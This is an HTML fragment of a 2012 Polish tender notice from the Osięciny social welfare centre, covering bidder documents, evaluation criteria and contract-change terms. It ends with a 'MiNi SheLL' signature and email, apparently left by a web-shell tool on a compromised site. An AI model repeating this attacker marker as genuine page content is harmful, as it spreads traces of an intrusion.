<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz Ofertowy, Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać w szczególności ustanowionego pełnomocnika oraz zakres jego umocowania. Programy szkoleń.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Doświadczenie Wykonawcy - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień umowy                         w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli wystąpią następujące okoliczności:
         a)   nastąpi zmiana przepisów wpływających na realizację przedmiotu zamówienia,
         b) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie, 
        c)  konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących 
Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej,
d) konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego,
e) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć w chwili zawarcia umowy,
f) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
g) zaistnieją okoliczności niezależne od Zamawiającego lub Wykonawcy , uzasadniające zmianę terminu realizacji przedmiotu umowy.
2. Zamawiający dopuszcza także zmianę osoby/osób prowadzącej/ych  zajęcia w toku realizacji zamówienia , ale jedynie w uzasadnionych przypadkach, w szczególności na wypadek choroby lub innej okoliczności uniemożliwiającej osobie prowadzącej zajęcia wykonywanie obowiązków wynikających z umowy. Zmiana osoby prowadzącej zajęcia wymaga uzyskania pisemnej zgody Zamawiającego oraz jest dopuszczalna pod warunkiem, że wskazana osoba (zastępcza) posiada takie same kwalifikacje i co najmniej takie samo doświadczenie zawodowe jak osoba wskazana w ofercie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-osieciny.samorzady.pl//<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, ul. I Armii Wojska Polskiego 14, 88-220 Osięciny, biuro Kierownika GOPS.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2012 godzina 11:00, miejsce: Gminny Osrodek Pomocy Społeczej, ul. I Armii Wojska Polskiego 14, biuro Kierownika GOPS.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu systemowego Czas na zmiany współfinansowanego  z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013; Priorytet VII - Promocja Aktywnej Integracji; Działanie 7.1. - Rozwój i upowszechnianie aktywnej integracji; Poddziałanie 7.1.1. - Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com